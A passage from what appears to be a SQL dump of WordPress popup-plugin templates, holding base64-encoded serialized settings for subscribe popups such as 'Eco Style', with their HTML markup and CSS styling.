ImJnX3R5cGVfMyI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMyI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzMiO3M6NzoiI2Y1NGYzNiI7czo5OiJiZ190eXBlXzQiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzQiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl80IjtzOjc6IiNmZmZmZmYiO3M6OToiYmdfdHlwZV81IjtzOjM6ImltZyI7czo4OiJiZ19pbWdfNSI7czo0NDoiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvRGlzY291bnQtQ29kZS5wbmciO3M6MTA6ImJnX2NvbG9yXzUiO3M6MDoiIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzAwMDAwMCI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjMDAwMDAwIjtzOjExOiJmb250X2Zvb3RlciI7czo3OiJkZWZhdWx0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjMDAwMDAwIjtzOjk6ImNsb3NlX2J0biI7czoxMToiY2xhc3N5X2dyZXkiO3M6NzoiYnVsbGV0cyI7czoxMToibGlzdHNfZ3JlZW4iO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo2OiJTdWJtaXQiO3M6MTU6ImVuYl9zbV9mYWNlYm9vayI7czoxOiIxIjtzOjE3OiJlbmJfc21fZ29vZ2xlcGx1cyI7czoxOiIxIjtzOjE0OiJlbmJfc21fdHdpdHRlciI7czoxOiIxIjtzOjk6InNtX2Rlc2lnbiI7czo2OiJzaW1wbGUiO3M6ODoiYW5pbV9rZXkiO3M6NDoibm9uZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czowOiIiO3M6MTE6ImxheWVyZWRfcG9zIjtzOjM6InRvcCI7czo5OiJlbmJfbGFiZWwiO3M6MToiMSI7czo1OiJsYWJlbCI7czozNToiU3Vic2NyaWJlIDxiciAvPmFuZCAgPGJyIC8+R2V0IE5ld3MiO3M6OToiZm9vdF9ub3RlIjtzOjU4OiJZb3VyIEluZm9ybWF0aW9uIHdpbGwgbmV2ZXIgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IjtzOjU6InR4dF8wIjtzOjE4OToiPHA+VHVycGlzIGRpcyBhbWV0IGFkaXBpc2NpbmcgaGFjIG1vbnRlcyBvZGlvIGFjIHZlbGl0PyBQb3J0YSwgbm9uIHJob25jdXMgdnV0LCB2ZWwsIGV0IGFkaXBpc2NpbmcgbWFnbmEgcHVsdmluYXIgYWRpcGlzY2luZyBlc3QgYWRpcGlzY2luZyB1cm5hLiBEaWduaXNzaW0gcmhvbmN1cyBzY2VsZXJpc3F1ZSBwdWx2aW5hcj88L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiI2IjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Didact+Gothic\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div class=\"mail-img\"></div>\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_label]\r\n					<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n				[endif]\r\n				<div class=\"logo\"></div>\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n					[txt_0]\r\n					</div>\r\n				[endif]\r\n				<div style=\"clear: both;\"></div>\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n						[sub_form_start]\r\n						[sub_fields_html]\r\n						<input class=\"singup\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n						<input class=\"ppsPopupClose ppsPopupClose_[close_btn]\" type=\"submit\" name=\"submit\" value=\"Exit\"/>\r\n						[sub_form_end]\r\n						<div style=\"clear: both;\"></div>\r\n					</div>\r\n				[endif]\r\n				[if enb_sm]\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n  [if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  	{% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 50%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n	font-family: \'Didact Gothic\';\r\n	font-size: 50px;\r\n  	font-style: normal;\r\n	font-variant: normal;\r\n	font-weight: 500;\r\n	line-height: 46.4px;\r\n	color: #ffffff;\r\n	margin-bottom: 16px;\r\n	padding-left: 50px;\r\n  	width:60%;\r\n  	float: left;\r\n	[if bg_type_4 == \'color\']\r\n  	color: [bg_color_4];\r\n  	[elseif bg_type_4 == \'img\']\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .mail-img{\r\n	[if bg_type_1 == \'color\']\r\n	background: [bg_color_1];\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	border-radius: 50%;\r\n	-moz-border-radius: 50%;\r\n	-webkit-border-radius: 50%;\r\n	position: absolute;\r\n	top: -20px;\r\n	left: -30px;\r\n	height: 110px;\r\n	width: 110px;\r\n  	[if bg_type_2 == \'color\']\r\n	background: [bg_color_1];\r\n  	[elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	[endif]\r\n	background-position: 22px 31px;\r\n	box-shadow: 0px 0 0px 8px rgba(115, 125, 143, 0.5);\r\n}\r\n#ppsPopupShell_[ID] .logo{\r\n	[if bg_type_5 == \'color\']\r\n	background: [bg_color_1];\r\n  	[elseif bg_type_5 == \'img\']\r\n  	background-image: url(\"[bg_img_5]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	border-radius: 50%;\r\n	-moz-border-radius: 50%;\r\n	-webkit-border-radius: 50%;\r\n	height: 130px;\r\n	width: 130px;\r\n  	float: left;\r\n  	[if bg_type_5 == \'color\']\r\n	background: [bg_color_5];\r\n  	[elseif bg_type_5 == \'img\']\r\n  	background-image: url(\"[bg_img_5]\");\r\n  	background-repeat: no-repeat;\r\n  	[endif]\r\n	box-shadow: 0px 0 0px 8px rgba(115, 125, 143, 0.5);\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	/*display: table-cell;*/\r\n  	float:right;\r\n  	width: 100%;\r\n  	height: 100%;\r\n  	margin-bottom: 30px;\r\n  	margin-top: 65px;\r\n  	padding-right: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell {\r\n	padding: 30px 50px 0 70px;\r\n	text-align: right;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: none;\r\n  	border-radius: 3px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	padding-left: 30px;\r\n  	font-size: 17px;\r\n  	background-image: url(\"[PPS_ASSETS_URL]img/assets/input-name.png\");\r\n	background-repeat: no-repeat;\r\n	background-position: 5px center;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	margin-left: -5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n  	padding-left: 30px;\r\n    background-image: url(\"[PPS_ASSETS_URL]img/assets/input-email.png\");\r\n    background-repeat: no-repeat;\r\n    background-position: 5px center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n  	font-family: \'Open Sans\', arial;\r\n	margin-right: -30px;;\r\n	font-weight: 100;\r\n	color: #ffffff;\r\n  	float: left;\r\n  	width: 40%;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	padding: 0;\r\n  	[if bg_type_3 == \'color\']\r\n  	background: [bg_color_3];\r\n   \r\n  	[elseif bg_type_3 == \'img\']\r\n  	background-image: url(\"[bg_img_3]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n  	opacity:0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	text-align: center;\r\n  	font-family: \'Open Sans\', arial;\r\n 	font-weight: 100;\r\n	color: #ffffff;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	font-size: 17px;\r\n  	[if bg_type_4 == \'color\']\r\n  	color: [bg_color_4];\r\n  	[elseif bg_type_4 == \'img\']\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	margin-left: 70px;\r\n	margin-right: 40px;\r\n    float: left;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n  	position: static !important;\r\n  	background-image: none !important;\r\n    width: 192px !important;\r\n    height: 40px !important;\r\n  	float:right !important;\r\n    [if bg_type_1 == \'color\']\r\n	background: [bg_color_1] !important;\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\") !important;\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n  	padding-left: 30px;\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/security_ico.png\");\r\n	background-repeat: no-repeat;\r\n	background-position: 5px center;\r\n  	height: 20px;\r\n  	[if bg_type_4 == \'color\']\r\n  	color: [bg_color_4];\r\n  	[elseif bg_type_4 == \'img\']\r\n  	[endif]\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg {\r\n	clear: both;\r\n  	float: left;\r\n}','discount.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',8,0),(21,'Eco Style',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjU4OntzOjU6IndpZHRoIjtzOjM6IjU1MCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNmZmZmZmYiO3M6OToiYmdfdHlwZV8xIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18xIjtzOjM0OiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9idG4ucG5nIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiM4MWQ3NDIiO3M6OToiYmdfdHlwZV8yIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18yIjtzOjM2OiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy8yMzY0NC5wbmciO3M6MTA6ImJnX2NvbG9yXzIiO3M6NzoiIzgxZDc0MiI7czoxMDoiZm9udF9sYWJlbCI7czo3OiJkZWZhdWx0IjtzOjE2OiJsYWJlbF9mb250X2NvbG9yIjtzOjc6IiMxZTczYmUiO3M6MTA6ImZvbnRfdHh0XzAiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzAiO3M6NzoiIzgxZDc0MiI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzU4NTg1OCI7czo5OiJjbG9zZV9idG4iO3M6MTE6IndoaWxlX2Nsb3NlIjtzOjc6ImJ1bGxldHMiO3M6MTE6Imxpc3RzX2dyZWVuIjtzOjEzOiJlbmJfc3Vic2NyaWJlIjtzOjE6IjEiO3M6ODoic3ViX2Rlc3QiO3M6OToid29yZHByZXNzIjtzOjIzOiJzdWJfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxOToic3ViX2F3ZWJlcl9saXN0bmFtZSI7czowOiIiO3M6MjE6InN1Yl9hd2ViZXJfYWR0cmFja2luZyI7czowOiIiO3M6MjE6InN1Yl9tYWlsY2hpbXBfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9ncl9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV91cmwiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX2tleSI7czowOiIiO3M6MTg6InN1Yl9hcl9mb3JtX2FjdGlvbiI7czowOiIiO3M6MTA6InN1Yl9zZ2FfaWQiO3M6MDoiIjtzOjE1OiJzdWJfc2dhX2xpc3RfaWQiO3M6MDoiIjtzOjIxOiJzdWJfc2dhX2FjdGl2YXRlX2NvZGUiO3M6MDoiIjtzOjEwOiJzdWJfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo2OntzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJzdWJfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToic3ViX3R4dF9zdWNjZXNzIjtzOjI0OiJUaGFuayB5b3UgZm9yIHN1YnNjcmliZSEiO3M6MjE6InN1Yl90eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoic3ViX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gc3Vic2NyaXB0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InN1Yl90eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NzoiWW91IHN1YnNjcmliZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgc3Vic2NyaXB0aW9uLiBJZiB5b3UgZGlkIG5vdCBzdWJzY3JpYmUgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoyNToic3ViX3JlZGlyZWN0X2VtYWlsX2V4aXN0cyI7czowOiIiO3M6MTM6InN1Yl9idG5fbGFiZWwiO3M6NjoiU3VibWl0IjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6NDoiYm94eSI7czo4OiJhbmltX2tleSI7czo0OiJub25lIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMToibGF5ZXJlZF9wb3MiO3M6MzoidG9wIjtzOjk6ImVuYl9sYWJlbCI7czoxOiIxIjtzOjU6ImxhYmVsIjtzOjIyOiJTdWJzY3JpYmUgYW5kIEdldCBOZXdzIjtzOjk6ImVuYl90eHRfMCI7czoxOiIxIjtzOjk6ImZvb3Rfbm90ZSI7czoxMTg6IldlIHJlc3BlY3QgeW91ciBwcml2YWN5LiBZb3VyIGluZm9ybWF0aW9uIHdpbGwgbm90IGJlIHNoYXJlZCB3aXRoIGFueSB0aGlyZCBwYXJ0eSBhbmQgeW91IGNhbiB1bnN1YnNjcmliZSBhdCBhbnkgdGltZSAiO3M6NToidHh0XzAiO3M6Mzg6IjxwPmRpc2NvdW50cyBvbiBhbGwgdHlwZXMgb2YgZ29vZHM8L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIzIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Amatic+SC\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input class=\"butt\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: \'arial\', 